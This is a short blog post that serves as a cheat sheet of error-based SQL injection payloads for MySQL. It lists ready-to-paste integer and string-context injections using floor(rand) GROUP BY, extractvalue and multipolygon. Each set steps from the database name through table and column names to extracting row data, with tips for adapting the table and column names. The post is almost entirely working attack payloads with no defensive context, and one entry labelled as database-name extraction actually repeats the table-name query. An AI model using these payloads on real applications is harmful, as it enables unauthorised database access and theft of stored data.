2018-03-05

Erro based SQL Injection - MySQL

Pranaam to All _/\_

This blog post is about exploiting error based SQL Injection (only for MySQL database).

Normal SQL Injection:

Case 1 - Integer Based

Database Name extraction 
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Table name extraction
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) 

To extract next table name, change value in limit clause from 0,1 to 1,1 and so on


Column name  extraction
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) 

To extract next column name, change value in limit clause from 0,1 to 1,1 and so on


Data extraction
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) 

In my case column name is "user" and table name is "data", replace it appropriate column name and table name so that you can extract data.


Case 1 - String Based

Database Name extraction 
-> '  and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2



Table name extraction
-> ' and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)  and 1<'2



To extract next table name, change value in limit clause from 0,1 to 1,1 and so on

Column name  extraction
-> '  and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)  and 1<'2


To extract next column name, change value in limit clause from 0,1 to 1,1 and so on

Data extraction
-> '  and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2

In my case column name is "user" and table name is "data", replace it appropriate column name and table name so that you can extract data.



Case 2 - String Based (using extractvalue function)

Database Name extraction
-> ' and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2


Table name extraction
-> ' and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2




Column name  extraction
-> ' and extractvalue(6678,concat(0x7e,(select  column_name from information_schema.columns where table_schema=database() LIMIT 0,1),0x7e )) and 1<'2



Data extraction
-> ' and extractvalue(6678,concat(0x7e,(select  id from data LIMIT 0,1),0x7e )) and 1<'2

In my case column name is "id" and table name is "data", replace it appropriate column name and table name so that you can extract data.



Case 3 - String Based (using multipolygon function)

Database Name extraction 
->  ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,database(),0x7e))a)b))) and 1<'2



Table name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,table_name,0x7e) from  information_schema.tables where table_schema=database() limit 0,1)a)b))) and 1<'2



Column name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,column_name,0x7e) from  information_schema.columns where table_schema=database() limit 0,1)a)b))) and 1<'2



Data extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,id,0x7e,user,0x7e) from  data limit 0,1)a)b))) and 1<'2

Share this post

0 comments

© 2009 Start With Linux | Mannu Linux
Designed by cyb3r.gladiat0r
Posts RSSComments RSS
Back to top